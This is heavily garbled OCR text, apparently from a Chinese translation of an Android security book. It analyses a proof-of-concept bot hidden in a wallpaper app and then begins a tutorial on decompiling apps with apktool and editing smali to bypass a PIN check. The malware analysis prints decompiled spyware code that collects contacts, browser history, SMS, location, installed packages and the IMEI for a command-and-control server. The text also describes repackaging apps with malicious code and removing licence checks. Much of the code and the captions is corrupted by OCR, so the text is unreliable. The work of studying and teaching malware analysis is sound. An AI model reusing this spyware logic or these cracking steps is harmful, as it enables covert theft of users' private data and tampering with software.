1f (Integer .parseInt(locolCursor .getString(localCursor. getColumnIndex( "has phone number*))) > 9) 
( 
localOb;ect3 = this.cr; 
locolübject?2 = ContoctsControct .CommonDot aK 1nds . Phone . CONTENT. URT ; 
localOb;ect] = nem $Str:ng[1]: 
localObjecti(0] = str2; 
localO0bjecti = ((ContentResolver)locolO0bject3), query((Uri )1ocolO0bject2, null, "contact.id = ?^, localobJecti, null); 
(CCursor )localÓb Ject1) soveTofirst(); 
tf CCCCursor)locolObject1). getCount() > 8) 
strl = ((Cursor)localObjecti) getString((CCursor)locolObject1) .getColumnIndex("datc1")); 
((Cursor)localOobjecti? close(); 
) 
Object locolObjectl = ~"; 
ContentResolver localContentResolver = this. cr; 
Object locolübject3 « ContoctsContract .CommonDaotakinds Esai l, CONTENT .URT ; 
Object localObject2 = nem String[1); 
localObject2[8] = strž; 
localObject? = locoltontentResolver.query((Uri)locolObject?, null, "contact id = ?^, localObject2, nali); 
((Cursor )locolOÓbject2) .aoveToFirst(); 
1f ((CCursor)localObject2). getCount() > 8) 
tecalóbjectl = ((Cursor)localOb ject2) . getStringCCCCursor)1ocalOb ject2). getColumnindex( 'dato1")); 
CCCur sor )locolObject2) . closet); 
localAerayList.odd( $tr3); 
localArrayl ist .add( str1); 
locolArrayList , odd(localOb ject1); 
localHashntoble.put(str2, localárraytist): 
n tring. ArrayList<String>>) -Str ing, Array isteSteing»») QM 5f nino ArrayList«String»»)localHoshtable; 


图 6.13 4 localObjectl 值 为 101 时 ，BotClient 调用 GetContactInfo( ) 函数 
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Y B com.adam.CutePuppiesWallpaper 
> |J) BotBroadcastHandler 
» (|J BotClient 


DD BotLocationHandler 


b [J] BotSMSHandler 
b [J] BotSMSListner 
b (D) BotService 
v [J] BotWorker 
Y (9 BotWorker 

oS LOG TAG : String 

3 cr: ContentResolver 

o ctx: Context 
BotWorker(ContentResolver, Context) 
GetBrowserHistory() : List «String» 
GetContactinfo( ; Hashtable «String, Arraylist«String» » 
GetCurrentLocation( : ArrayList«String » 
GetDevicelDOQ : String 
GetPackagesinstalled( : ArrayList«String» 
GetReceivedSMSO : List«String» 
ReadContacts( | Hashtable «String, String» 


o o o 9 9 Oo o € 


6.14  BotWorker 7E X I peg 7A 


public BotWorker(ContentResolver paramContentResolver, Context paramContext) 
{ 

this.cr = paramContentResolver; 

this.ctx = paramContext; 

BotSMSHandler . Intit1ali:ze(); 

BotLocationHandler.lInitialize(paramContext) ; 


6.15 BotWorker 2S B +5 f BR SC 





public List«String» Gel 
{ 
LinkedList locallinkedList = new LinkedList(); 
Cursor localCursor = Browser.getAllVisitedUrls(this.cr); 
localCursor.moveToFirst(O; 
if (localCursor.getCount() » 9) 

while (localCursor.moveToNext()) 

localLlinkedList.add(localCursor.getString(0)); 

return localLinkedList; 


6.16  BotWorker 类 的 GetBrowserHistory( ) 函数 
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public Hashtable«String, ArrayList«String»» EU) 


} 


Hoshtable localHashtable » new Hashtoble(); 
Cursor localCursor = this. cr.query(ContactsControct Contacts. CONTENT_URI. null, null, null, null); 
if (loecalCursor.getCaount() > 8) 

while (localCursor .moveToNext()) 


( 
Arraylist locolárrayList = new ArrayList(); 
String str? = locolCursor.getString(locolCursor. getColumnIndex(" :d")); 
String str3 = localCursor.getString(localCursor . getColumnIndex( "61 splay name" )); 
String stri = *" 
if (Integer. porseInt(localCursor.get5tring(localCursor. getColumnIndex( "has phone number"))) > 0) 
( 
localObject3 = this cr; 
localO0bject2 = ContactsContract .CommonDatoK1nds , Phone . CONTENT, URT; 
localObjectl = new String[1]; 
localObjecti[0] = str2; 


localübjecti - ((ContentResolver)local0bject3).query((Uri )locolübject2, null, "contact id = ?", localObjecti, null); 


(CCursor)localObjecti).moveToFirst(); 
if (((Cursor)locolObject1).getCount() > 9) 
stri = ((Cursor)localObject1) .getString(((CCursor)locol06ject1). getColumnIndex( "data1")); 
(CCursor)locolOb ject1).close(); 
) 
Object locolObjecti = ""; 
ContentResolver localContentResolver = this cr; 
Object localObject3 = ContoctsControct. CommonDatoKinds Email , CONTENT. URT ; 
Object localÓbject2 = nem String(1]; 
locolÓbject2[0] = str2; 
locolübject2 » localContentResolver.query((Uri)localO0bject3, null, "contoct id = ?", localÓbject2, null); 
(CCursor)locolObject2) moveToFirstQO: 
if CCCCursor)locolObject2).getCount() > 9) 
locolóbjectl = ((Cursor)localObject2) getString(((Cursor)localObject2) . getColumnIndex( "data1")); 
CCCursor)localOb]ject2) .close(); 
locolArroyList.odd(str3); 
localàrraylist.odd(str1); 
localàrrayList.add(localObjecti); 
locolHashtable.put(str2, locolárraytist); 


} 
return (Hashtable<String, ArrayList«String»»)(Hashtoble«String, Arraylist«String»»)(Hashtoble«String, ArrayList«String»»)locolHoshtable; 


图 6.17  BotWorker 类 的 GetContactInfo( ) PKI% 





public ArrayList«String» Ge 
{ 
ArrayList localArrayList = new Arraylist(); 
Object localObject = BotLocationHandler.GetLastLocatton(); 
try 
t 


String str2 = Double.toString(((Location)localObject) .getLongitude()) ; 
String strl = Double.toString(CCLocation)localObject) .getLatitude()); 
localÓbject = Double.toString(CCLocation)localObject) .getAl ti tude()); 


localArraylL1st. add(str2); 
localArrayList.add(str1); 
localArrayList . add(localObject) ; 
return localArrayList; 


} 
catch (NullPointerException localNullPointerException) 
{ 
while (true) 
Log.v("MCS BOT. BotWorker", "No Location Found"); 
} 


图 6.18  BotWorker 类 的 GetCurrentLocation( ) PA% 
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public String aeaiO 
1 : 

return ((TelephonyManager )this ctx, getSystemService(^phone^)) getDeviceldO; 
} 


public ArroyList<String> GetPackagesInstolled() 
1 
ArrayList localaárrayList = new ArrayList}; 
PackageManager LocalPackageManager = this.ctx.getPackageManager( ); 
Object local06ject » new Intent("android.intent octioo MAIN^, null); 
(CIntent)localOb ject) .oddCategory( "android, intent. categary . LAUNCHER* ): 
localO0bject » locolPackageManoger . queryIntentActivities((Intent)localObject, 0).1terotor(); 
while (C(Iterator)localübject ) .hasNext() ) 
localárrayList.odd((C(Resolvelnfo)((Iterator)localOb;ect) .next()).acttvityInfo. opplicatioeInfo leadLcbel(locolPackngeManager ) . toStr109g(); 
return (ArrayList«String»)locclArrayList; 


图 6. 19 BotWorker 中 的 GetDeviceID( ) AXI 





public ArrayList«String» 而 
t 

ArrayList localárraylist = new Arroylist(); 

PackageManager localPockogeManager = this, ctx. getPackageManoaer() ; 

Object local0bject = new Intent(^ondroid. intent. oction MAIN”, null); 

KCIntent)locolObject) . addCotegory( "android. intent, category. LAUNCHER" Y; 

localObject = localPackageManager . queryIntentActivities((Intent)localO0b3ect, 8).iterotor(); 

while (C(Iterator)localObject) .hasNext()) 

localarrayList .add(((ResolveInfo)((Iterator)localObject) .next()) .octivityInfo.opplicationInfo. loodLabel(localPackogeManoger ) . to$tringO: 
return CArrayList«String»)locolarrayList; 


图 6.20 BotWorker 中 的 GetPackagesInstalled( ) PR 


public List«String» ERGI 
i 


ArrayList localárraylist = new ArrayListO; 
localárroylist.addAll(BotSMSHondler. GetMessages()); 
return localárrayList; 

Li 


[8 6. 21  BotWorker 中 的 GetReceivedSMS( ) PRA 


public Hashtoble«String, String» MeedConbectsC) 
[ 
| Hashtoble locolHashtable = new Hoshtabtel); 
Cursor localCursor » this.cr.query(ContactsCootract. Contacts. CONTENT URT, null, null, null, null); 
if C(locolCursor.getCount() > 8) 
while (locolCursor moveToNext()) 
local Hashtable.put(localCursor.getString(locolCursor. getColumnIndex(" 1d*)), localCursor. getString(localCursor, getColumnIndex(" di spla, 
return locolHashtable; 
) 
) 


图 6.22  BotWorker 中 的 ReadContacts( ) 函数 


BotLocationHandler. class 类 文件 分 析 : 
BotClient 类 使 用 成 员 变量 bwr 调用 GetCurrentLocation( ) 函数 获取 位 置 数据 ， 
该 函数 随即 调用 BotLocationHandler 类 定义 的 GetLastLocation ( ) PR, $k HX 4 Ri 


OQ  bwr 是 BotClient 类 设置 的 一 个 成 员 变量 ， 从 图 6. 10 的 代码 段 截图 中 可 见 ，bwr 是 BotWorker 类 的 实 
例 ， 所 以 BotClient 类 可 以 通过 bwr 对 象 调用 BotWorker 类 定义 的 各 种 公共 成 员 函 数 。 一 一 译 者 注 
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BOT 客户 问 的 位 置 ， 如 图 6. 23 所 示 。 


public closs BotLlocationHandler 
implements LocotionListener 
ü 
public static final String LOG TAG = "MCS BOT BotlocotionHondler" ; 
private static String bestProvider, 
private stotic Location tior, 
private stotic LocationManager locationMonager; 


public static Location GetLostLocation() 


( 
return ES， 
) 


| public static void Initialize(Context poramContext) 
( 
locattooManager = (LocationMonoger )paramContext . get SystemService( "location"); 
Criterio localCriteria » new Criterio); 
bestProvider = locationManager.getBestProvider(localCriteria, false); 
| ] 


public void onLocattonChoanged(Location paramLocotion) 

{ 
Log.YC MES_B0T_8otLocpttonHoandler”，Double. toString(paromLocation getLatitude()) + " " + Double. toString(paramLocation, getLongitude()) + " 
BUE - poroLocotion; 


| } 
6.23  BotLocationHandler. class 中 定义 的 GetLastLocation( ) PAI% 


BotSMSHandler. class 类 文件 分 析 : 

BotClient 类 使 用 成 员 变 量 bwr 调用 GetReceivedSMS( ) 函数 获取 SMS 信息 。 
GetReceivedSMS( ) 函数 定义 在 BotWorker 类 中 ， 该 函数 随即 调用 BotSMSHandler 类 
定义 的 GetMessages( ) 函数 。 定 义 在 BotSMSHandler 类 中 的 onReceive( ) PEZ fa s 
监听 SMS 消息 的 到 来 ， 并 将 其 缓存 发 送 给 远程 服务 着 ， 如 图 6. 24 所 示 。 

将 上 述 分 析 综 合 起 来 ， 分 析 CutePuppiesWallpaper 应 用 程序 

基于 上 述 对 各 个 文件 的 具体 分 析 ， 可 以 得 出 这 样 的 结论 ， 即 CutePuppiesWall- 
paper 应 用 是 一 个 恶意 程序 。 只 要 局 动 该 应 用 程序 ， 它 会 立即 开局 一 个 后 从 服务 。 
在 该 应 用 程序 的 内 部 包含 了 一 个 概念 验证 9 方式 的 BOT 程序 ， 它 可 以 借助 Socket 
通信 连接 到 主 命令 与 控制 中 心 (Command and Control Center，CnC ) 。 随 后 等 竺 来 
B CnC 的 命令 ， 该 中 心 能 够 向 设备 上 的 BOT 程序 发 送 多 种 不 同 的 命令 。 

虽然 该 应 用 程序 声称 自己 是 一 个 壁纸 应 用 程序 ， 但 是 它 请 求 的 权限 ， 如 接收 
SMS 信息 RECEIVE SMS 权限 ， 以 及 为 SMS 信息 接收 组 件 Receiver 定义 的 Intent 过 
滤器 ， 超 出 了 一 个 壁纸 应 用 程序 的 功能 范畴 。 通 过 源码 分 析 ， 可 见 该 应 用 程序 为 远 
程 服务 器 建立 了 后 门 。 应 用 程序 能 够 根据 远程 服务 器 发 送 的 命令 ， 向 BOT 服务 各 
发 送 各 种 信息 ， 包 括 联系 人 信息 、 浏 览 器 历史 、SMS 信息 、 位 置信 息 (包括 GPS 
坐标 ) 、 设 备 上 的 程序 安装 列表 、 设 备 的 IMEI 码 ， 等 等 。 

根据 图 6. 12 可 以 构造 表 6.4, 介绍 BOT 程序 发 送 的 命令 。 


日、 概念 验证 (Proof of Concept，POC) ， 与 Exploit 同 义 ， 指 的 是 利用 漏洞 而 编写 的 攻击 程序 。 一 一 评 有 让 
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| 
public class BotSMSHandler extends BroodcastReceiver 


public static final String LOG TAG = "MCS BOT BotSMSHandler"; 
| private static final int MAX SMS = 10; 
| private static int SMSCounter; 
private static List«String» lSmsMessages; 
I 





public static List«String» 
( 

return l5msMessages; 
) 


public static void Initialize() 
1 5 
l$msMessages = nem ArrayList); 
SMSCounter = 6; 
) 


public void onReceive(Context paramContext, Intent paramIntent) 
{ 
Object[] arrayOfObject = (Object[])paramIntent .getExtras().get( "pdus"); 
Log.v("MCS BOT BotSMSHandler", "SMS Received'n"); 
SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfOb7ect . length]; 
for Cint j = 8; j < orrayOfObject.length; j++) 
| arrayOfSmsMessage[j] = SmsMessage. createFromPdu( (byte[ ])arrayOfObject(1]5; 
| StringBuilder localStringBuilder = nem StringBuilder(O; 
| int i = arrayOf SmsMessage. length; 
| for (int k = ð; k < 1; k++) 
{ 
| SmsMessoge localSmsMessage = orrayOf SmsMessagefk]; 
| locolStringBuilder.append("Received SMS\nfrom: ^); 
locolStringBuilder.append(locolSmsMessoge.getD:i splayOriginatingAddress()); 
localStringBuilder.append( "sn^); 
localString8uilder,append(localSmsMessoge . getDisplayMessageBody()) ; 
) 
l5msMessages.add( SM$Counter % 10, localStringBuilder.toString(CO); 
SMSCounter = 1 + SMSCounter; 


-—— PP— —À 


图 6.24  BotSMSHandler. class 中 定义 的 GetMessages( ) PRIX 


x 6.4 CnC 发 送 给 BOT 客户 端的 命令 


t ^4 用 3x 
MCS. CONTACTS, INFO 获取 联系 人 信息 
MCS. BROWSER. HISTORY 获取 浏览 器 历史 
MCS_SMS 获取 接收 的 消息 
MCS_LOCATION 从 设备 上 获取 GPS 信息 
MCS, PACKAGES | 获取 安装 应 用 软件 列表 
MCS_DEVICE_INFO 获取 设备 信息 


根据 上 述 分 析 ， 可 以 推出 Cute Puppies 壁纸 应 用 程序 的 工作 流程 如 图 6. 25 
所 示 。 
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步骤 1: 用 户 从 应 用 程序 
商店 下 载 Cute Puppies 壁 纸 软 件 







步骤 3: BOT 客 户 端 连 接 CnC 





步骤 3: BOTH T dI] 


步骤 2: 用 户 打开 壁纸 软件 BOTSE ALS S: | 
FR: BOT 后 台 服务 开始 运行 EUER TE 
步骤 6: BOT 客 户 端 处 理 来 自 CnC \ 
的 命令 ， 并 根据 命令 将 设备 上 的 

数据 传送 给 CnC 


图 6.25 恶意 程序 Cute Puppies 工作 流程 图 


一 旦 用 户 从 Android 应 用 市 场 或 其 他 软件 源 下 载 并 安装 该 应 用 程序 ， 当 应 
序 在 设备 上 启动 后 ，BOT 服务 将 随 之 在 后 全 开始 运行 ,并且 BOT A EA 
CnC。BOT 服务 器 同 该 客户 端 建立 连接 后 发 送 命 令 给 BOT 客户 端 。BOT EJ s 
据 来 自 CnC 的 命令 将 数据 返回 给 服务 售 。 


6.5 小 结 


本 章 主要 讨论 了 恶意 软件 及 构成 恶意 软件 的 行为 。 然 后 ， 讨 论 了 Android 应 用 

序 的 恶意 行为 ， 并 使 用 现 有 的 方法 引导 读者 分 析 Android 应 用 程序 的 恶意 行为 。 
i 本 章 介绍 了 一 个 案例 ， 逐 步 演示 了 恶意 应 用 程序 的 分 析 方式 ， 从 而 确定 恶意 
应 用 程序 的 行为 和 功能 。 
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本 章 以 第 6 章 的 内 容 为 基础 ， 以 重新 编译 /修改 应 用 程序 行为 的 案例 讨论 为 开 
妨 ， 演 示 分 析 和 调试 Android 应 用 程序 二 进 制 安装 文件 (apk 文件 ) ,的 方式 方法 ， 
介绍 .dexz 文 件 的 格式 ， 以 及 在 没有 应 用 程序 源码 的 情况 下 ， 演 示 如 何 对 Android 应 
用 程序 进行 反 编 译 和 重新 编 泽 ， 从 而 实现 改变 应 用 程序 行为 的 目的 。 此 外 ， 本 章 还 
将 介绍 攻击 者 是 如 何 通 过 反 编 译 应 用 程序 、 改 变 smali 代码 和 重新 编译 的 方式 ， 改 
变 应 用 程序 行为 的 。 


7.1 概述 


普通 的 用 户 和 程序 开发 人 员 一 般 不 会 用 到 本 章 介绍 的 这 些 技术 ,使 用 这 些 技术 
的 人 很 可 能 试图 进行 下 述 操作 (如果 执 行 的 操作 没有 违法 的 话 ， 也 有 可 能 是 不 道 
德 的 ): 

1) 在 应 用 程序 中 添加 恶意 的 行为 。 

2) 清除 应 用 程序 中 恶意 的 行为 。 

3) 绕 过 应 用 程序 设计 的 特定 的 功能 。 


7.1.1 添加 恶意 的 行为 

”应 当 注 意 的 是 ， 这样 做 是 违法 的 。 亚 意 用 户 可 以 下 载 一 个 Android 应 用 程序 
(Capk) ， 对 它 进 行 反 编译 ， 添 加 亚 意 行为 ， 然 后 重新 打包 应 用 程序 ， 将 其 发 布 到 二 
级 Android 应 用 市 场 。 由 于 Android 应 用 程序 可 以 从 多 个 应 用 市 场 上 下 载 ， 因 此 一 


些 用 户 可 能 会 被 诱导 ， 安 装 这 些 已 经 修改 过 的 恶意 应 用 程序 ， 从 而 成 为 恶意 应 用 程 
序 行 为 的 受害 者 。 


7.1.2 清除 恶意 的 行为 


本 章 所 列 的 技术 ， 用 于 对 可 疑 的 应 用 程序 进行 分 析 。 如 果 检 测 到 应 用 程序 存在 
非法 /恶意 的 行为 ， 需 要 对 其 进行 修改 并 移 除 这 些 非 法 /恶意 的 行为 。 分 析 应 用 程序 
的 恶意 行为 对 于 确保 用 户 的 信息 安全 ， 是 相当 必要 的 。 而 且 ， 还 可 以 将 其 用 作对 恶 
意 攻击 者 进行 处 罚 的 取证 目的 。 不 过 ， 如 采 确 实 检测 到 恶意 行为 ， 用 户 只 需要 删除 
相关 的 应 用 程序 ， 然 后 从 可 靠 的 软件 源 上 ， 重 新 下 载 并 安装 一 个 “干净 ”的 应 用 
程序 即 可 。 
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7.1.3 ERII RE 


本 章 所 列 技 术 的 第 三 种 用 法 ， 是 用 来 绕 过 应 用 程序 设计 的 特定 功能 。 许 多 应 用 
程序 在 使 用 前 ， 需 要 输入 注册 码 或 密 钥 序列 号 ， 否 则 只 能 在 指定 的 试用 时 间 内 使 
用 ,或 是 在 使 用 过 程 中 向 用 户 显示 广告 。 这 时 ,使 用 这 些 技术 编辑 smali 代码 ， 就 
可 以 绕 过 应 用 程序 的 上 述 功能 机 制 。 


7.2 DEX 文件 格式 


第 2 章 介 绍 了 Dalvik 虚拟 机 (VM) ， 它 是 专 为 运行 Android 应 用 程序 而 设计 的 
基于 寄存 器 的 虚拟 机 。Dalvik 虚拟 机 能 够 | | 
使 应 用 程序 在 电池 和 人 处理 能 力 有 限 的 设备 pt 


上 高 效 运行 。 使 用 Java 语言 编写 的 Android | 

应 用 程序 通过 Java 编译 器 被 编译 成 Java 字 
程序 ， 额 外 地 增加 了 一 个 步 又， 就 是 
将 . class 文件 ( Java F P xc fF) 转换 — 






Dex RE Dalvik 虚拟 机 上 运行 ， 对 于 多 
个 . class 文件 ;上 具 会 生成 一 小 .dex X f, 
其 中 所 有 有 关 的 .class 文件 通过 Dalvik dx 
编译 器 被 编译 成 一 个 . dex 文件 。. dex 文件 
的 结构 如 图 7. 1 所 示 。 


成 . dex 文件 (Dex 文件 或 Dalvik 字 节 码 )。 
bn SDK 38 i T 
具 ， 可 以 用 来 获取 并 显示 dex 文件 的 内 容 。 


但 是 ， 查 看 这 些 内容 对 于 初学 者 来 说 信息 EQUES ades ctia 
量 不 大 ， 也 就 是 说 没有 太 大 的 用 处 和 帮助 。 

图 7.3 显示 了 dex 文件 的 header (文件 头 部 ) 信息 (使 用 命令 “dexdump-f 
查看 ) ， 该 dex 文件 classes. dex 通过 编译 HelloActivity. java 文件 获得 ， 如 图 7.2 所 
示 。 从 图 7.3 中 可 以 看 到 ，classes. dex 文件 包含 了 有 关 dex 文件 本 身 的 信息 ， 包 括 
校 验 和 、 文 件 大 小 、 头 部 大 小 ， 以 及 . dex 文件 中 各 字段 的 大 小 和 偏 移 量 。. dex X 
件 中 包含 的 字段 如 下 ; 头 部 、 字 符 串 、 类 型 、 属 性 、 函 数 ， 以 及 数据 。 程 序 中 每 一 
个 类 都 有 一 个 人 口 。 图 7.4 显示 的 是 HelloActivity 类 的 人 人口 ， 同 时 该 入 口内 也 显示 
了 HelloActivity 类 内 部 定义 的 函数 (如 init, OnCreate 函数 )。 图 7.5 显示 的 是 资源 
R 类 的 人 口 。 
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4 
package com.hello.world; 


import androtid.app.Activity; 
import android.os.Bundle; 


public class HelloActivity extends Activity ( 
/** Called when the activity i5 first created. *"/ 
Override 
public void onCreate(Bundle savedInstanceState) ( 
super.onCreate(savedInstoanceStote); 
setContentView(R, layout.main); 


} 
Hd -vm-2 ; -/Androi d/workspace/Hello/src/com/hello/world$ 





图 7. 2 一 个 简单 的 Android 17 Hello World" 程序 


“GeXNPIRSSNN ' 
: 41eQOfaf 
` T0 NER. 1d 


string ids siz 

string ids off 

type. tas sire t 14 

type ids off t 248 (Ox90QQOfB) 
field ids size A 

field tds off .340 (00009154) 
method ids size ; 11 

method ids. off : 372 (9$x9000174) 
tloss efs size *- 

class defs off JL. NC oi 
data size “ 1252 

data off : 652 Cax00028c) 





[X] 7. 3 HelloActivity 程序 classes. dex 文件 的 头 部 信息 


正如 从 图 7.4 和 图 7.5 中 看 到 的 ，dexdump 工具 的 输出 不 能 提供 直观 的 信息 ， 
尽管 它 对 于 理解 应 用 程序 行为 的 位 置 和 数量 有 一 定 的 帮助 ， 但 是 这 些 信息 是 相当 不 
可 读 的 。 因 此 ， 本 章 将 使 用 smali/baksmalie9 汇 编 / 反 汇编 器 分 析 和 修改 . dex 格式 文 
(FS, HERH, smali 文件 更 容易 理解 。smali 装载 . dex 文件 并 生成 对 应 的 smali 
文件 ， 这 种 文件 更 具有 可 读 性 ， 而 且 在 smadi 文件 中 还 包含 了 调试 、 注 释 和 行 信息 
^& . baksmali 能 够 把 smali 文件 编译 回 . dex 格式 。apktool 工具 能 够 把 修改 后 的 . dex 
文件 重新 打包 生成 apk 文件 。 


© smali 和 baksmali 分 别 是 指 Android 系统 里 Dalvik 虚拟 机 使 用 的 一 种 . dex 格式 文件 的 汇编 器 和 反 汇 编 
器 。 它 实现 了 . dex 格式 所 有 功能 ( 如 注解 ， 调 试 信息 ， 线 路 信息 等 )。smali 和 baksmali 分 别 是 冰岛 
语 中 编译 器 和 反 编译 器 的 叫 法 。 至 于 为 什么 要 用 冰岛 语 是 因为 Dalvik 虚拟 机 的 名 字 “Dalvik” 就 是 一 
个 冰岛 渔村 的 名 字 。 一 一 译 痢 注 

© WÁ http; //code. google. com/p/smali/, ———ifE$tik 
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ce File idx 
atozions off 
loss P NIAE 
totic 4115-2 size 
nstonce fields size: 


Class descriptor : 'Loom/hello/world/WelloActivity; ' 
Access flogs HI EC ISO 
Supecclass : 'Londroid/app/Activity; ' 
Interfaces - 
Static fields 
Instance fields 
Direct metnods 
(in Loom/nello/world/MelloActivity; ) 
:[o'eilnito" 
Rd o, M 
; exile (PUBLIC CONSTRUCTOR) 


1 
i 
~ 
4 


l-dit Ooo units 
fG] com hello.wocld.nelloActivity, «init»; {V 
IL. METUS IPIE AU NET Cn o aatis METEO eetnodeoooed 
i33: return-voià 
cotos "i6 v 
positions - 
Dr EDU 
iocols $ 
(x08 - oO reg this Lcom/thello/worla/MHelioActisi ty ; 


Virtual methods 
> Cin Lomvhello/sorld/Melloactivity;} 
7 'oKreate' 
] '(Landeotid/os/Bundle;)v ' 
access ME CPUSLICO) 
registers : 3 
los :2 
outs $2 
insns sire : 9 16-bit code units 
jc: I(G92dc] com.bello.world,nelloActivity.onCreate: (Laodrotd/os/Bundle;)V 


[E 7.4 classes. dex 文件 中 HelloActivity 类 的 信息 


Closs #1 heoder: 

closs (dx HESS 

occess flogs > 17 (09011 7) 
superclass idx - 

interfaces off 

source, file. (dx 

annotations. off : 888 (Ox900378) 
class. doto off z 1636 (00006564) 
stotic fields size : 0 

instance _fields_size: 0 

direct methods size : 1 

virtual methods size; 8 


Class $1 
Class descriptor : 'Lcom/nello/world/R$attr; ' 
Access flags : OBLI CPUBLIC FINAL) 
Supercloss t 'Ljava/long/Object ; ' 
Interfoces 
Static fields 
Instance fields 
Direct methods 
mA : Cin Loom/heilo/morldMRSottr;) 
nome : teinit’ 
type “CY 
occess ; 010091 (PUBLIC CONSTRUCTOR) 
coce 
registers 1 
ins 1 
outs l 
insns size 4 16-bit code units 
[60903090] com.hello.world.R.attr «init»: (OV 
7010 8Bo00 0000 (0000: imwvoke-direct {vO}, L java/Tang/0b ject s imt 0) /7 methode oeba 
10003: return-void 
Zi. 
positions 
px line» 
locols - 
&x0900 - SHB reg=d this Lcom/hella/world/R$attr; 


Virtual methods 
source file idx 15 (R. jovo) 


图 7.5 classes. dex 文件 中 R 类 的 信息 
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7.3 案例 研究 : 修改 应 用 程序 行为 


接 下 来 将 演示 如 何 把 Android 应 用 程序 通过 反 编译 成 smali 代码 ， 重 新 编译 ， 
重新 打包 成 apk 文件 的 方式 ， 修 改 Android 应 用 程序 的 行为 。 本 书 作 者 编写 了 一 个 
简单 的 应 用 程序 一 一 “SecureApp”， 该 应 用 程序 需要 用 户 在 使 用 之 前 输入 正确 的 密 
人 码 。 本 节 将 演示 恶意 用 户 是 如 何 绕 过 这 一 预定 功能 的 。 该 应 用 运行 截图 如 图 7.6 和 
图 7.7 所 示 。 





图 7.7 成 功 登录 SecureApp 应 用 
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在 分 析 或 逆向 工程 一 个 应 用 程序 时 ， 第 一 步 要 理解 应 用 程序 的 功能 和 和 行为 s 通 


常情 况 下 ， 需 要 先 安装 、 使 用 应 用 程序 ， 并 且 分 析 
应 用 程序 提供 的 各 种 功能 。 本 案例 中 ， 自 先 将 该 应 
用 程序 安装 在 模拟 器 上 ， 然 后 再 试用 该 应 用 程序 。 
如 图 7.8 所 示 ， 应 用 程序 启动 后 ， 显 示 密 码 输入 界 
面 。 此 时 ， 用 户 并 不 知道 所 需 密码 的 长 度 ， 以 及 密 
码 是 全 由 数字 组 成 (如 PIN) ， 还 是 一 个 更 为 复杂 的 
密码 。 通 过 反复 的 试验 和 失败 的 过 程 ， 了 解 到 该 应 
用 程序 的 密码 输入 框 仅 能 够 输入 数字 ， 而 且 人 允许 办 
人 的 最 大 长 度 为 4 位 。 因 此 ， 可 以 认为 该 应 用 程序 
的 密码 是 由 4 位 数字 构成 的 。 

步骤 1: 反 编译 应 用 程序 

使 用 apktool 工具 可 以 反 编 译 应 用 程序 文件 
(apk)。 图 7.9 显示 了 SecureApp. apk #4 x: 2p VE E 
secure. app 文件 夹 内 。 浏 览 该 文件 夹 内 容 ， 如 
图 7.10 所 示 ， 其 中 包含 一 个 smali 文件 夹 。 所 有 的 





2 s d 14:11 


图 7.8 分 析 应 用 程序 的 行为 


smali 文件 被 放置 在 smali/andsec/test 文件 夹 下 。 如 图 7. 11 所 示 ， 该 文件 夹 内 的 所 
有 smali 文件 的 文件 名 都 以 KeyPad 或 R 前 级 开始 。 由 此 可 以 推出 ， 该 应 用 只 有 两 


个 Java 文件 ， 即 KeyPad. java 和 R. javas 


pentestusrié&tools-gibbons - vm-2:-/Android/androíid-sdk/tools$ ls $* 
SecureApp . apk 


pentestusrietools-gibbons-vm-2:«/Android/android-sdk/tools$ apktool decode SecureApp.opk secure app 


I: Baksmaling... 
1; Loading resource toble... 
I: Decoding resources... 


I: Looding resource table from file: /home/pentestusrl/apktool/fromework/1. apk 


I: Copying assets and libs... 
pentestusr1Étools-gibbons-vm-2:-/Android/android-sdk/tools$ 





图 7.9 使 用 apktool 反 编 译 SecureApp. apk 


entestusriétool s-gibbons -wi- 2: -/Android/android-sOK/tools/secure app 
z 


, i 
- 1 pentestusri pentestusri 597 2012-02-28 08:52 AndroidManifest.xm 


r-- 1 pentestusrl pentestusr1 92 2012-02-28 98:52 opktool.yml 


7 pentestusri pentestuscl 4096 2012-02-28 08:52 
testusri pentestusr1 40996 7012-02-28 08:52 


iis ^vm- 2 */Android/androt d-sdk/tools/secure app$ 
$-wmn-7'-/Android/androi d- sdk/tools/secure , app/ sma 


cd smali/ondsec/testy 


L/andsec/test$ 1s ~i 


ntestusri pentestusri 5621 2012-02-28 08:52 KeyPadSi. smali 


stusri 24968 2012-02-28 08:52 KeyPad, smali 
-28 08:52 RASattr.smoli 


012-02-28 08:52 RSdrowable,. smali 


2-28 08:52 R$id.smoli 


2-28 05:52 RSlayout. smal 


7-28 98:52 R.smali 


02-28 08:52 R$string.smali 
tool5/secure. app/smali/andsec/test3 





图 7.10 使 用 apktool 创建 的 smali 文件 
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Closs Londsec/test/VueyPad$1 ; 
„Super Ljava/long/Ub ject ; 
.Smmurcem 


,unplements Londroid/vi en ViewsonCLickListener; 


,annotution system Ldolvik/annotation/EnclosingMethiod ; 
value Londsec/test/KeyPad; -»onCrectet( Londrol d/o0s/ Bundle; )V 
|, end annotation 


annotation £ystem LóGlvik/oannotation/InnerC loss; 


tic tnisS0:Londsec/test/KeyPod; 
field private final Synthetic vdi$botn5uomit:Londncota/widget/Buttoa; 
„field private final synthetic valfetf?ass Londrotd^m dget/EditText; 
.field private finol synthetic val$tvLabel:Lunmdroid/wi dget/TextVien; 


field private finol synthetic val$tvMsg: Landroia/widget/Textytiew; 


mstructor «init»(Landsec/cesc/KeyPod; Londnoid/widget/Edi t Text ; LoGdrot d/widget/Button; Landrotid/w dgec/Texty ten; Landreoi d/wi dget/TextVi em; 


iput-object pil, , Londsec/rest/KeyPaods1; -»this $0 :Londsec/test/KeyPad ; 
ipst-object p2, , Landsec/test/XeyPad31; -»val$ertPasszLond^otd/w dgec/EditTexc; 
iput-object p3, , Laondsec/test/WeyPag$1i ; -»vali$otnSubm t: Londnotd/wt dget/Button; 


iput-objecx pt, , Londsec/test/KeyPod$1; -»vol$tvLopel : Landrotd/wi dget/Textviem; 


wput-object p5, , VLandsec/test/KeyPod$1 ; -»vol $twVsog: Landroti d/widget/Texr Vie; 


iine 36 
invoke-direct {pi L'java/long/Ub ect; -»«intt» OY 





图 7.11 KeyPad. smali 文件 


步骤 2: 修改 应 用 程序 

如 图 7. 12 所 示 ， 读 完 KeyPad $ 1. smali 文件 中 的 smali 代码 ， 可 以 推出 ， 该 程 
序 使 用 SHA-2562 算 法 计算 用 户 在 应 用 程序 登录 界面 输入 密码 的 散 列 值 。 然 后 将 计 
算得 到 的 密码 散 列 值 同 应 用 程序 存储 的 密码 进行 比 对 ， 如 果 匹 配 则 允许 用 户 登录 应 
用 程序 。 

如 图 7. 13 中 标注 的 行 51 所 示 ， 将 该 散 列 值 (hash) 装载 到 变量 v8 中 ， 并 与 
